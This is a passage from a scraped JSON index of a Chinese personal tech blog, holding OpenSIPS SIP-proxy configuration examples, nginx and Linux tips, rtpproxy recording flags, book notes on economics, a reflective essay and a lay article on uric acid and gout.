-s \u0026#34;request for you\u0026#34; $$EMAIL \u0026#39;)) { # exec returned error ... user does not exist # send a stateful reply t_reply(\u0026#34;404\u0026#34;, \u0026#34;User does not exist\u0026#34;); } else { t_reply(\u0026#34;600\u0026#34;, \u0026#34;No messages for this user\u0026#34;); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/exec/","summary":"# # $Id$ # # simple quick-start config script # # ----------- global configuration parameters ------------------------ #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;exec.so\u0026#34; # ----------------- setting module-specific parameters --------------- route{ # uri for my domain ? if (is_myself(\u0026#34;$rd\u0026#34;)) { if ($rm==\u0026#34;REGISTER\u0026#34;) { save(\u0026#34;location\u0026#34;); return; }; # native SIP destinations are handled using our USRLOC DB if (!lookup(\u0026#34;location\u0026#34;)) { # proceed to email notification if ($rm==\u0026#34;INVITE\u0026#34;) route(1) else sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; }; # user found, forward to his current uri now if (!","title":"exec"},{"content":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a 
message is # labeled with this flag, its completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { log(\u0026#34;LOG: Too many hops\\n\u0026#34;); sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; if ($ml \u0026gt;= 2048 ) { sl_send_reply(\u0026#34;513\u0026#34;, \u0026#34;Message too big\u0026#34;); exit; }; # Process record-routing if (loose_route()) { # label BYEs for accounting if (is_method(\u0026#34;BYE\u0026#34;)) setflag(1); t_relay(); exit; }; # labeled all transaction for accounting setflag(1); # record-route INVITES to make sure BYEs will visit our server too if (is_method(\u0026#34;INVITE\u0026#34;)) record_route(); # forward the request statefuly now; (we need *stateful* forwarding, # because the stateful mode correlates requests with replies and # drops retranmissions; otherwise, we would have to report on # every single message received) if (!t_relay()) { sl_reply_error(); exit; }; } ","permalink":"https://wdd.js.org/opensips/ch8/acc/","summary":"# # $Id$ # # example: accounting calls to nummerical destinations # # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- acc params -- # set the reporting log level modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_level\u0026#34;, 1) # number of flag, which will be used for accounting; if a message is # labeled with this flag, its 
completion status will be reported modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1 ) # ------------------------- request routing logic ------------------- # main routing logic route{ /* ********* ROUTINE CHECKS ********************************** */ # filter too old messages if (!","title":"acc"},{"content":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default 
\u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd. line: -v) dns=no # (cmd. line: -r) rev_dns=no # (cmd. line: -R) port=5060 children=4 # # uncomment the following lines for TLS support #disable_tls = 0 #listen = tls:your_IP:5061 #tls_verify_server = 1 #tls_verify_client = 1 #tls_require_client_certificate = 0 #tls_method = TLSv1 #tls_certificate = \u0026#34;/usr/local/etc/opensips/tls/user/user-cert.pem\u0026#34; #tls_private_key = \u0026#34;/usr/local/etc/opensips/tls/user/user-privkey.pem\u0026#34; #tls_ca_list = \u0026#34;/usr/local/etc/opensips/tls/user/user-calist.pem\u0026#34; # ------------------ module loading ---------------------------------- # set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database # - MySQL loaded for accounting as well loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;rr.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; loadmodule \u0026#34;usrloc.so\u0026#34; loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;textops.so\u0026#34; loadmodule \u0026#34;acc.so\u0026#34; loadmodule \u0026#34;mi_fifo.so\u0026#34; # Uncomment this if you want digest authentication # db_mysql.so must be loaded ! 
#loadmodule \u0026#34;auth.so\u0026#34; #loadmodule \u0026#34;auth_db.so\u0026#34; # ----------------- setting module-specific parameters --------------- # -- mi_fifo params -- modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) # -- usrloc params -- #modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) # Uncomment this if you want to use SQL database # for persistent storage and comment the previous line modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 2) # -- auth params -- # Uncomment if you are using auth module # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;calculate_ha1\u0026#34;, yes) # # If you set \u0026#34;calculate_ha1\u0026#34; parameter to yes (which true in this config), # uncomment also the following parameter) # #modparam(\u0026#34;auth_db\u0026#34;, \u0026#34;password_column\u0026#34;, \u0026#34;password\u0026#34;) # -- acc params -- modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@localhost/opensips\u0026#34;) # flag to record to db modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_missed_flag\u0026#34;, 2) # flag to log to syslog modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_flag\u0026#34;, 1) modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_missed_flag\u0026#34;, 2) # use extra accounting to record caller and callee username/domain # - take them from From URI and R-URI modparam(\u0026#34;acc\u0026#34;, \u0026#34;log_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;db_extra\u0026#34;, \u0026#34;src_user=$fU;src_domain=$fd;dst_user=$rU;dst_domain=$rd\u0026#34;) # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if 
(!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; }; # subsequent messages withing a dialog should take the # path determined by record-routing if (loose_route()) { # mark routing logic in request append_hf(\u0026#34;P-hint: rr-enforced\\r\\n\u0026#34;); if(is_method(\u0026#34;BYE\u0026#34;)) { # account BYE for STOP record setflag(1); } route(1); }; # we record-route all messages -- to make sure that # subsequent messages will go through our proxy; that\u0026#39;s # particularly good if upstream and downstream entities # use different transport protocol if (!is_method(\u0026#34;REGISTER\u0026#34;)) record_route(); # account all calls if(is_method(\u0026#34;INVITE\u0026#34;)) { # set accounting on for INVITE (success or missed call) setflag(1); setflag(2); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { # mark routing logic in request append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); # if you have some interdomain connections via TLS #if($ru=~\u0026#34;@tls_domain1.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain1.net\u0026#34;); #\texit; #} else if($ru=~\u0026#34;@tls_domain2.net\u0026#34;) { #\tt_relay(\u0026#34;tls:domain2.net\u0026#34;); #\texit; #} route(1); }; # if the request is for other domain use UsrLoc # (in case, it does not work, use the following command # with proper names and addresses in it) if (is_myself(\u0026#34;$rd\u0026#34;)) { if (is_method(\u0026#34;REGISTER\u0026#34;)) { # Uncomment this if you want to use digest authentication #if (!www_authorize(\u0026#34;opensips.org\u0026#34;, \u0026#34;subscriber\u0026#34;)) { #\twww_challenge(\u0026#34;opensips.org\u0026#34;, \u0026#34;0\u0026#34;); #\texit; #}; save(\u0026#34;location\u0026#34;); exit; }; if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound alias\\r\\n\u0026#34;); route(1); }; # native SIP destinations are handled using our USRLOC DB if 
(!lookup(\u0026#34;location\u0026#34;)) { sl_send_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; }; append_hf(\u0026#34;P-hint: usrloc applied\\r\\n\u0026#34;); }; route(1); } route[1] { # send it out now; use stateful forwarding as it works reliably # even for UDP2TCP if (!t_relay()) { sl_reply_error(); }; exit; } ","permalink":"https://wdd.js.org/opensips/ch8/acc-mysql/","summary":"# # Sample config for MySQL accouting with OpenSIPS # # - db_mysql module must be compiled and installed # # - new columns have to be added since by default only few are recorded # - here are full SQL statements to create acc and missed_calls tables # # CREATE TABLE `acc` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # CREATE TABLE `missed_calls` ( # `id` int(10) unsigned NOT NULL auto_increment, # `method` varchar(16) NOT NULL default \u0026#39;\u0026#39;, # `from_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `to_tag` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `callid` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `sip_code` char(3) NOT NULL default \u0026#39;\u0026#39;, # `sip_reason` varchar(32) NOT NULL 
default \u0026#39;\u0026#39;, # `time` datetime NOT NULL default \u0026#39;0000-00-00 00:00:00\u0026#39;, # `src_ip` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `dst_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # `src_user` varchar(64) NOT NULL default \u0026#39;\u0026#39;, # `src_domain` varchar(128) NOT NULL default \u0026#39;\u0026#39;, # INDEX acc_callid (`callid`), # PRIMARY KEY (`id`) # ); # # # ----------- global configuration parameters ------------------------ log_level=3 # debug level (cmd line: -dddddddddd) log_stderror=no # (cmd line: -E) /* Uncomment these lines to enter debugging mode */ #debug_mode=yes check_via=no\t# (cmd.","title":"acc-mysql"},{"content":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function starts the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.). Multiple pseudo-variables can be monitored by specifying a pv_format_string (e.g. \u0026#34;$ru---$avp(var1)\u0026#34;). The logs produced by multiple/different traced regions of your script can be differentiated (tagged) by specifying an additional plain string - info_string - as the 3rd parameter. To disable script tracing, just do script_trace(). Otherwise, the tracing will automatically stop at the end of the top route. 
Example of usage: script_trace( 1, \u0026#34;$rm from $si, ruri=$ru\u0026#34;, \u0026#34;me\u0026#34;); will produce: [line 578][me][module consume_credentials] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 581][me][core setsflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 583][me][assign equal] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:111211@opensips.org) [line 592][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 585][me][module is_avp_set] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 589][me][core if] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 586][me][module is_method] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) [line 587][me][module trace_dialog] -\u0026gt; (INVITE 127.0.0.1 , ruri=sip:tester@opensips.org) [line 590][me][core setflag] -\u0026gt; (INVITE from 127.0.0.1 , ruri=sip:tester@opensips.org) ","permalink":"https://wdd.js.org/opensips/ch7/cfg-trace/","summary":"script_trace是核心函数,不需要引入模块。\nscript_trace([log_level, pv_format_string[, info_string]]) This function starts the script tracing - this helps to better understand the flow of execution in the OpenSIPS script, like what function is executed, what line it is, etc. Moreover, you can also trace the values of pseudo-variables, as script execution progresses. The blocks of the script where script tracing is enabled will print a line for each individual action that is done (e.g. assignments, conditional tests, module functions, core functions, etc.","title":"script_trace 打印opensips的脚本执行过程"},{"content":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上又出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我读过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说得通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 
员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地铁由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事业,私营公司来做可能要比政府做得更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济因为疫情的影响而下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。\n","permalink":"https://wdd.js.org/posts/2020/05/kn7c4e/","summary":"之前读完鱼、美元和经济学的故事第一版,令我印象深刻。后来kindle上又出现了这本书的第二版,内容增加了,并且也增加了一些好看的插图。\n我读过不少经济学的书,《国富论》是比较深奥的一本,我只能看懂前面一两章,就读不下去了。\n但是小岛经济学的这本书,真的把经济学里难以理解的东西说得通俗易懂。\n也许经济学本来并不是那么难以理解,只是专家慢慢变多了,他们就把经济学变得难以理解了。因为只有这样,才能显得他们是多么的富有聪明才智。\n1. 自己的生意 每个人实际上都在经营自己的生意,将自己的劳动力卖给出价最高的老板。\n2. 员工的价值 员工的价值主要取决于三个方面:\n需求(老板是否需要员工所掌握的技能) 供应(有多少人具备这些技能) 生产力(员工对那些工作完成的程度如何) 所以,你的价值并不会因为你吃苦耐劳而升高。\n3. 纽约地铁 纽约的地铁由私营公司建设,40年内都是由私营公司负责运营。虽然地铁造价不菲,但是还是实现了盈利。更值得一提的是,40年里车票的价格从未上涨。\n这是值得深思的地方,有些公共事业,私营公司来做可能要比政府做得更好、效率更高。\n政府对公共设施的垄断,很大的可能会造成效率低下和贪污腐败。\n4. 经济的目的 提供就业岗位并不是经济的目的,经济的目的是不断提高生产力。\n5. 膨胀与紧缩 通货膨胀就是货币的供给增加,相反的就是通货紧缩。价格并不会膨胀或者紧缩,价格只能上涨或者下跌。膨胀的不是价格,而是货币供给。\n6. 谁需要你的货币? 如果没有人想购买你的产品,也就没有人需要你的货币。\n美国的很多产品在全世界都很吃香,所以美元是很多国家都需要的。\n7. 人们为何消费? 经济并不会因为人们的消费而增长,而是经济增长会自然的带动人们的消费。\n但是目前看来,眼下最为火爆的就是“带货”这个词,各种人物,无论是公众明星还是普通人,都想来搞带货。\n各种新闻报道也在大肆宣扬,某某明星直播带货xxx亿元。\n当你被xxx亿元吸引时,你是否也曾暗暗思考过,这些钱来自哪里? 买这些东西对于消费者来说,又有什么好处。\n在经济因为疫情的影响而下行时,为什么会有那么多人疯狂购物呢?\n天下皆知美之为美,斯恶已。我想这种带货的模式,也许就快要到尽头了。\n8. 量化宽松 北京的白菜(一到)浙江,便用红头绳系住菜根,倒挂在水果店头,尊为“胶菜”;福建野生着的芦荟,(运往)北京就请进温室,且美其名曰“龙舌兰”. 
《藤野先生》鲁迅\n明明白白的通货膨胀,到了经济学家和政客的嘴里,美其名曰“量化宽松”。","title":"小岛经济学: 鱼、美元和经济的故事"},{"content":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice\n","permalink":"https://wdd.js.org/posts/2020/05/ei2y93/","summary":"-.slice\n用 \u0026ndash; 表示参数已经结束\ncat \u0026ndash; -.slicevim \u0026ndash; -.slice","title":"文件名以-开头"},{"content":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_balance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance会优先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20个呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","permalink":"https://wdd.js.org/opensips/ch6/load-balance/","summary":" 负载均衡只能均衡INVITE, 不能均衡REGISTER请求。因为load_balance底层是使用dialog模块去跟踪目标地址的负载情况。 load_balance方法会改变INVITE的$du, 而不会修改SIP URL 呼叫结束的时候,目标地址的负载会自动释放 选择逻辑 网关A 网关B 通道数 30 60 正在使用的通道数 20 55 空闲通道数 10 5 load_balance会优先选择最大可用资源的目标地址。假如A网关的最大并发呼叫是30, B网关最大并发呼叫是60。在某个时刻,A网关上已经有20个呼叫了, B网关上已经有55个呼叫。 此时load_balance会优先选择网关A。\n参考 https://opensips.org/Documentation/Tutorials-LoadBalancing-1-9 ","title":"负载均衡模块load_balance"},{"content":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-record/","summary":"-a -R -r /recording -S spool -P -a 所有的通话都录音 -R 不要把RTCP也写文件 -r 指定录音文件的位置 -S 临时文件的位置,注意不要和录音文件位置相同 -P 录成pcap文件的格式,而不要录成默认的 Ad-hoc的模式 ","title":"rtpproxy录音"},{"content":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","permalink":"https://wdd.js.org/posts/2020/05/es9hvu/","summary":"隐藏版本号 nginx会在响应头上添加如下的头。\nServer: nginx/1.17.9 如果不想在Server部分显示出nginx的版本号,需要在nginx.conf的http{}部分设置\nhttp { server_tokens off; } 然后重启nginx, nginx的响应头就会变成。\nServer: nginx ","title":"nginx 
配置不显示版本号"},{"content":"pwdx pid lsof -p pid | grep cwd ","permalink":"https://wdd.js.org/posts/2020/05/azkyhl/","summary":"pwdx pid lsof -p pid | grep cwd ","title":"获取进程工作目录"},{"content":" 人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包在被子里,而她只能通过哭闹反映自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~\n","permalink":"https://wdd.js.org/posts/2020/05/nkegg6/","summary":"人的大脑中有个器官,叫做下丘脑。下丘脑有控制体温的功能。刚出生的婴儿,下丘脑发育不完全,无法调节自己的体温。所以一般都把小宝宝包在被子里,而她只能通过哭闹反映自己的不适。\n随着身体的发育,下丘脑逐渐掌握体温控制的功能。\n白天越来越长,从电脑屏幕上抬起头,发现已经有人收拾桌面,准备好要下班了。\n不知不觉,已经六点多了。\n夕阳西下,晚霞似火,凉风习习。\n漕河泾的腾讯大楼,影子被拉到地下停车场的入口,彷佛是情人间的法式舌吻。\n园区里行人匆匆,车辆缓缓~\n掐指算起,毕业已四年。时间如白驹过隙,指间流沙。\n恍然间,三十将至,尚未而立。\n小孩子爱憎分明,喜欢与不喜欢就直接说,不懂得拐弯抹角。\n成年人放下爱憎,只有生存\n无论如何,你应当体谅别人的世界与你的不同。\n对你来说,很容易理解的问题。可能对别人来说,是难以理解的。\n不要将自己当作干柴,稍微一点,就成烈火。\n当你知道你将要说的话会让别人难堪时,请咽下去吧。\n不要轻易否定一个人的工作价值,每个人都希望自己得到肯定。\n无论是对待陌生人、同事、或者是朋友。\n我们不是刚出生的婴儿,我们有完全发育的下丘脑。\n控制你的体温,同时也控制你的脾气,你说话的方式。\n每个人都值得温柔以待,即使是你不喜欢的人。\n你好,下丘脑~","title":"你好,下丘脑"},{"content":" 从细胞说起 人体由细胞组成。人体的细胞中大约有40-60万亿个。细胞无时无刻不在新老更替、新陈代谢。\n微观世界的细胞变化,反映在人体身上,就是一个人从成长到衰老的过程。\n细胞中有一种重要的物质,核酸。核酸是脱氧核糖核酸(DNA)和核糖核酸(RNA)的总称。\n核酸由无数的核苷酸组成,核苷酸里有一种物质叫做嘌呤。而嘌呤和人体的尿酸有着密不可分的关系。\n除了作为遗传物质的一部分,嘌呤中的腺嘌呤也是腺苷三磷酸(ATP)的重要组成部分。ATP是人体直接的能量来源。\n在剧烈运动时,ATP会进一步分解成腺嘌呤。\n总之:尿酸和嘌呤的关系非常密切。人体细胞的遗传物质以及作为能量来源的ATP都会产生嘌呤。\n尿酸来源分类 内源性尿酸: 来自人体自身细胞衰亡,残留的嘌呤经过酶的作用产生尿酸 外源性尿酸: 大多来自食物中的嘌呤类化合物、核酸、核蛋白等物质、经过酶的作用下产生尿酸。 我们身体中的尿酸2/3来自自身的生命活动, 1/3来自食物。\n尿酸的合成与排泄 大部分的嘌呤在肝脏中经过氧化代谢、变成尿酸。在此过程中,有两类酶扮演着重要作用。 抑制尿酸合成的酶 促进尿酸合成的酶 2/3的尿酸通过肾脏排出。肾脏里也有能够促进或者抑制尿酸重吸收的酶。 1/3的尿酸通过肠道排出 
所以尿酸较高的患者,医生会让你抽血查肝功能和肾功能,如果肝脏中的某些指标异常,也会通过B超去做进一步的判断。\n很多人误以为尿酸是查尿液,实际上这是被尿酸的名字误解了,尿酸是抽血检测的。\n人体中酶在生命活动中扮演着重要的角色。酶就好像是太极中的阴与阳一样,相互制衡达到平衡之时,身体才会健康。否则阴阳失衡,必然会存在身体病变。\n另外一些降低尿酸的药品,例如苯溴马隆片,其药理也是通过降低肾脏对尿酸的重吸收,来促进尿酸的排泄的。\n食物中的尿酸对人体影响有多大? 具体哪些不能吃,哪些能吃,网上都有很多资料了。总之,大鱼大肉是要尽量避免的。食物主要要以清淡为主,吃饭不要吃撑,尽量做到7分饱,或者做到不饿为佳。\n高尿酸的危害 有溶解度相关知识的同学都会知道,溶质在溶液中都是有溶解度的,超过溶解度之后,物质就会析出。尿酸也是如此,过饱和的尿酸会析出称为尿酸结晶。\n这些结晶会沉积在关节和各种软组织,就可能造成这些部位的损害。\n当尿酸结晶附着在关节软骨表面上的滑膜上时,血液中的白细胞会把它当做敌人,释放各种酶去进攻。这些酶在进攻敌人的同时,也会造成自身关节软骨的溶解和自身软组织的损伤。 对痛风患者而言,感受到的就是苦不堪言的痛风性关节炎\n另外,大量的尿酸最终是通过肾脏排泄的,如果尿酸在肾脏上析出。对肾脏也会造成难以修复的损害,甚至患上尿毒症。光听这个尿毒症的名字,你就应该知道,这个病有多厉害。当你管不住自己嘴的时候,想想尿毒症吧。\n不要等到失去任劳任怨的肾脏之后,再后悔莫及。\n参考 https://baike.baidu.com/item/%E4%BA%BA%E4%BD%93%E7%BB%86%E8%83%9E ","permalink":"https://wdd.js.org/posts/2020/05/teadt5/","summary":"从细胞说起 